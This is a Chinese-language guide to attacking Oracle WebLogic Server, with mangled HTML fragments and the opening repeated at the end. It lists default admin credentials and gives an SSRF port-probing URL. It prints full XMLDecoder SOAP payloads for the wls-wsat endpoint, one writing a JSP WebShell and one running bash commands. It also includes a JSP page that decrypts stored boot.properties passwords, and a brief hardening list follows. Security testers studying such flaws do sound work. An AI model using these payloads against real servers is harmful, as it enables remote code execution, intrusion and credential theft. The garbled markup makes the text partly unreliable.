WebLogic安全测试全面指南<\/h1>

1. WebLogic简介<\/h2>
Oracle WebLogic Server是一个基于Java EE架构的应用服务器，广泛用于企业级应用部署。由于其广泛使用，WebLogic也成为安全测试的重点目标。<\/p>

2. 常见WebLogic安全漏洞及测试方法<\/h2>

2.1 管理员登录页面弱密码漏洞<\/h3>

测试方法：<\/strong><\/p>

默认端口：7001<\/li>
常见默认凭证：

weblogic\/Oracle@123<\/li>
weblogic\/weblogic<\/li> <\/ul> <\/li>
其他猜测方向：

公司名称相关组合<\/li>
人名相关组合<\/li> <\/ul> <\/li>
自动化工具：

使用Burp Suite的Intruder模块进行暴力破解<\/li> <\/ul> <\/li> <\/ol>
利用方法：<\/strong><\/p>

成功登录后可通过上传WAR包获取WebShell<\/li> <\/ul>
2.2 SSRF(服务器端请求伪造)漏洞<\/h3>
检测方法：<\/strong><\/p>

检查是否存在以下URL：
http:\/\/[目标IP]:7001\/uddiexplorer\/SearchPublicRegistries.jsp <\/code><\/pre> <\/li> 测试Payload示例： http:\/\/[目标IP]:7001\/uddiexplorer\/SearchPublicRegistries.jsp?operator=http:\/\/192.168.1.59:139&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search <\/span><\/span><\/span><\/code><\/pre><\/li> 端口状态判断：开放端口会返回不同响应<\/li> 未开放端口会返回错误<\/li> <\/ul> <\/li> <\/ol> 2.3 反序列化漏洞<\/h3> 测试要点：<\/strong><\/p> 已有多种公开工具可用<\/li> 常见利用点： T3协议<\/li> IIOP协议<\/li> <\/ul> <\/li> 建议使用成熟的测试工具如： ysoserial<\/li> WebLogicExploit<\/li> <\/ul> <\/li> <\/ol> 2.4 WebLogic UAC(未授权访问)漏洞<\/h3> 利用步骤：<\/strong><\/p> 方法一：直接上传WebShell<\/strong><\/p> 发送POST请求到： http:\/\/x.x.x.x:7001\/wls-wsat\/CoordinatorPortType <\/code><\/pre> <\/li> 添加Header： Content-Type: text\/xml <\/code><\/pre> <\/li> 请求体Payload： <soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span>><\/span> <\/span><\/span> <soapenv:Header><\/span> <\/span><\/span> <work:WorkContext<\/span> xmlns:work=<\/span>"http:\/\/bea.com\/2004\/06\/soap\/workarea\/"<\/span>><\/span> <\/span><\/span> <java><java<\/span> version=<\/span>"1.4.0"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span> <\/span><\/span> <object<\/span> class=<\/span>"java.io.PrintWriter"<\/span>><\/span> <\/span><\/span> <string><\/span>servers\/AdminServer\/tmp\/_WL_internal\/bea_wls_internal\/9j4dqk\/war\/a.jsp<\/string><\/span> <\/span><\/span> <void<\/span> method=<\/span>"println"<\/span>><\/span> <\/span><\/span> <string><\/span><![CDATA[<% out.println("test"); %>]]><\/span><\/string><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> method=<\/span>"close"<\/span>\/><\/span> <\/span><\/span> <\/object><\/span> <\/span><\/span> <\/java><\/span> <\/span><\/span> <\/work:WorkContext><\/span> <\/span><\/span> <\/soapenv:Header><\/span> <\/span><\/span> <soapenv:Body\/><\/span> <\/span><\/span><\/soapenv:Envelope><\/span> <\/span><\/span><\/code><\/pre> 默认路径：servers\/AdminServer\/tmp\/_WL_internal\/bea_wls_internal\/9j4dqk\/war\/<\/code><\/li> 注意：代码中不要包含中文，否则可能报错<\/li> <\/ul> <\/li> <\/ol> 方法二：Linux系统路径爆破<\/strong><\/p> <soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span>><\/span> <\/span><\/span> <soapenv:Header><\/span> <\/span><\/span> <work:WorkContext<\/span> xmlns:work=<\/span>"http:\/\/bea.com\/2004\/06\/soap\/workarea\/"<\/span>><\/span> <\/span><\/span> <java<\/span> version=<\/span>"1.8.0_131"<\/span> class=<\/span>"java.beans.xmlDecoder"<\/span>><\/span> <\/span><\/span> <void<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span>><\/span> <\/span><\/span> <array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span> <\/span><\/span> <void<\/span> index=<\/span>"0"<\/span>><\/span> <\/span><\/span> <string><\/span>\/bin\/bash<\/string><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> index=<\/span>"1"<\/span>><\/span> <\/span><\/span> <string><\/span>-c<\/string><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> index=<\/span>"2"<\/span>><\/span> <\/span><\/span> <string><\/span>find $DOMAIN_HOME -type d -name bea_wls_internal|while read f;do find $f -type d -name war;done|while read ff;do echo $ff >$ff\/a.txt;done<\/string><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/array><\/span> <\/span><\/span> <void<\/span> method=<\/span>"start"<\/span>\/><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/java><\/span> <\/span><\/span> <\/work:WorkContext><\/span> <\/span><\/span> <\/soapenv:Header><\/span> <\/span><\/span> <soapenv:Body\/><\/span> <\/span><\/span><\/soapenv:Envelope><\/span> <\/span><\/span><\/code><\/pre>2.5 WebLogic密码解密<\/h3> 在线解密方法：<\/strong><\/p> 获取加密密码（通常在boot.properties<\/code>文件中）默认路径：..\/..\/..\/Server\/security\/boot.properties<\/code><\/li> <\/ul> <\/li> 创建JSP解密页面： <%@page pageEncoding="utf-8"%> <%@page import="weblogic.security.internal.*,weblogic.security.internal.encryption.*"%> <% EncryptionService es = null; ClearOrEncryptedService ces = null; String s = null; s="{AES}wfFNcH6k+9Nz22r1gCMnylgUr9Ho5kz8nDgib\/TuOZU="; es = SerializedSystemIni.getEncryptionService(); if (es == null) { out.println("Unable to initialize encryption service"); return; } ces = new ClearOrEncryptedService(es); if (s != null) { out.println("\nDecrypted Password is:" + ces.decrypt(s)); } %> <\/code><\/pre> <\/li> <\/ol> 离线解密方法：<\/strong> 需要两个文件：<\/p> SerializedSystemIni.dat<\/code><\/li> boot.properties<\/code><\/li> <\/ol> 3. 防御建议<\/h2> 密码安全<\/strong><\/p> 修改默认密码<\/li> 使用强密码策略<\/li> 定期更换密码<\/li> <\/ul> <\/li> 漏洞修复<\/strong><\/p> 及时安装官方安全补丁<\/li> 禁用不必要的服务(如uddiexplorer)<\/li> 限制管理控制台访问IP<\/li> <\/ul> <\/li> 配置加固<\/strong><\/p> 关闭调试信息<\/li> 限制文件上传类型<\/li> 配置适当的访问控制<\/li> <\/ul> <\/li> 监控与审计<\/strong><\/p> 启用安全审计日志<\/li> 监控异常访问行为<\/li> 定期进行安全评估<\/li> <\/ul> <\/li> <\/ol> 4. 总结<\/h2> WebLogic作为企业级应用服务器，其安全性至关重要。本文涵盖了常见的WebLogic安全漏洞及测试方法，包括弱密码、SSRF、反序列化、未授权访问等漏洞的检测与利用方法，以及密码解密技术。安全测试人员应掌握这些技术以评估系统安全性，管理员则应采取相应措施加固WebLogic服务器。<\/p>

WebLogic安全测试全面指南<\/h1>

1. WebLogic简介<\/h2> Oracle WebLogic Server是一个基于Java EE架构的应用服务器，广泛用于企业级应用部署。由于其广泛使用，WebLogic也成为安全测试的重点目标。<\/p>

2. 常见WebLogic安全漏洞及测试方法<\/h2>

1. WebLogic简介<\/h2>
Oracle WebLogic Server是一个基于Java EE架构的应用服务器，广泛用于企业级应用部署。由于其广泛使用，WebLogic也成为安全测试的重点目标。<\/p>